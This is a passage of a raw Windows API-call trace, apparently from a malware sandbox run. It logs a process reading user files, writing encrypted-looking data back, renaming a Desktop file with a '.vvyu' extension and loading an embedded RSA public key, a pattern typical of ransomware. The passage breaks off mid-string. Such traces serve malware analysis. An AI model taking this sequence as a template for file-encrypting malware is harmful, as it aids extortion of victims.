RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa590) returned 0x2d36670 [0183.342] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0183.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2c4afd0 [0183.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d2fc98 [0183.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c98 [0183.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30880 [0183.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6f0 [0183.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30838 [0183.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e648 [0183.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e690 [0183.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e738 [0183.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6a8 [0183.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0183.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x6d5c88 [0183.344] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6d5c88, Size=0x218) returned 0x2d40c08 [0183.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d40e28 [0183.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e690 | out: hHeap=0x6a0000) returned 1 [0183.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6a8 | out: hHeap=0x6a0000) returned 1 [0183.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e738 | out: hHeap=0x6a0000) returned 1 [0183.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0183.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d40e28 | out: hHeap=0x6a0000) returned 1 [0183.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e738 [0183.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0183.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e6a8 [0183.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0183.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e690 [0183.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0183.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0183.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0183.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0183.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0183.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0183.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0183.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0183.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6a8 | out: hHeap=0x6a0000) returned 1 [0183.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e690 | out: hHeap=0x6a0000) returned 1 [0183.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0183.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0183.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e738 | out: hHeap=0x6a0000) returned 1 [0183.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c98 | out: hHeap=0x6a0000) returned 1 [0183.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d40c08 | out: hHeap=0x6a0000) returned 1 [0183.347] GetCurrentThreadId () returned 0x264 [0183.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0183.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6ce0b0 [0183.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0183.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0183.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0183.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0183.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0183.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0183.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.348] GetCurrentThreadId () returned 0x264 [0183.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0183.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0183.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0183.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c828a8 [0183.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0183.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0183.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0183.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e738 [0183.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0183.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0183.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0183.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0183.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0183.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0183.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0183.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e690 [0183.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0183.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0183.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0183.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0183.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0183.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e6a8 [0183.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0183.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0183.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0183.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e678 [0183.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0183.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e750 [0183.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0183.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6d8 [0183.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6c0 [0183.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0183.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e768 [0183.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6c0 | out: hHeap=0x6a0000) returned 1 [0183.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e6c0 [0183.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6d8 | out: hHeap=0x6a0000) returned 1 [0183.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0183.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0183.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0183.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0183.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0183.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e690 | out: hHeap=0x6a0000) returned 1 [0183.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e690 [0183.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d40c08 [0183.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e738 | out: hHeap=0x6a0000) returned 1 [0183.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0183.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e768 | out: hHeap=0x6a0000) returned 1 [0183.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d40e18 [0183.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0183.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0183.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0183.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e690 | out: hHeap=0x6a0000) returned 1 [0183.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d41030 [0183.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0183.353] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0183.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0183.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0183.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0183.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0183.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d40e18 | out: hHeap=0x6a0000) returned 1 [0183.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41030 | out: hHeap=0x6a0000) returned 1 [0183.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0183.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0183.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6c0 | out: hHeap=0x6a0000) returned 1 [0183.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e750 | out: hHeap=0x6a0000) returned 1 [0183.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0183.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6a8 | out: hHeap=0x6a0000) returned 1 [0183.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e678 | out: hHeap=0x6a0000) returned 1 [0183.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0183.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0183.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0183.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e648 | out: hHeap=0x6a0000) returned 1 [0183.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30838 | out: hHeap=0x6a0000) returned 1 [0183.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d40c08 | out: hHeap=0x6a0000) returned 1 [0183.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0183.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0183.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0183.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0183.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0183.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0183.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0183.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4afd0 | out: hHeap=0x6a0000) returned 1 [0183.359] WriteFile (in: hFile=0x584, lpBuffer=0x2d36670*, nNumberOfBytesToWrite=0xa580, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d36670*, lpNumberOfBytesWritten=0x30ffb14*=0xa580, lpOverlapped=0x0) returned 1 [0183.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36670 | out: hHeap=0x6a0000) returned 1 [0183.361] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xa585, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.361] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0183.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0183.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d36670 [0183.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d36670, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0183.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d36aa0 [0183.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36670 | out: hHeap=0x6a0000) returned 1 [0183.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0183.363] WriteFile (in: hFile=0x584, lpBuffer=0x2d36aa0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d36aa0*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0183.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36aa0 | out: hHeap=0x6a0000) returned 1 [0183.363] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0183.364] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0183.364] CloseHandle (hObject=0x584) returned 1 [0183.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0183.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x860) returned 0x2d36670 [0183.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0183.367] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\9ji3dkVzY.avi" (normalized: "c:\\users\\keecfmwgj\\desktop\\9ji3dkvzy.avi"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\9ji3dkVzY.avi.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\9ji3dkvzy.avi.vvyu")) returned 1 [0183.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36670 | out: hHeap=0x6a0000) returned 1 [0183.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.371] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0183.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0183.374] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1829bc40, ftCreationTime.dwHighDateTime=0x1d8a4d4, ftLastAccessTime.dwLowDateTime=0x2c9fa9f0, ftLastAccessTime.dwHighDateTime=0x1d8a62d, ftLastWriteTime.dwLowDateTime=0x2c9fa9f0, ftLastWriteTime.dwHighDateTime=0x1d8a62d, nFileSizeHigh=0x0, nFileSizeLow=0x161ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B8R3y.xlsx", cAlternateFileName="B8R3Y~1.XLS")) returned 1 [0183.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30838 [0183.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5e) returned 0x2c6ff30 [0183.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30838 | out: hHeap=0x6a0000) returned 1 [0183.374] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\B8R3y.xlsx") returned=".xlsx" [0183.374] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\B8R3y.xlsx" (normalized: "c:\\users\\keecfmwgj\\desktop\\b8r3y.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0183.375] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=90605) returned 1 [0183.375] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0183.378] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x161c7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.378] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0183.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.381] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.381] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x161ed, lpOverlapped=0x0) returned 1 [0183.383] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0183.383] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.383] lstrlenA (lpString="-----BEGIN PUBLIC 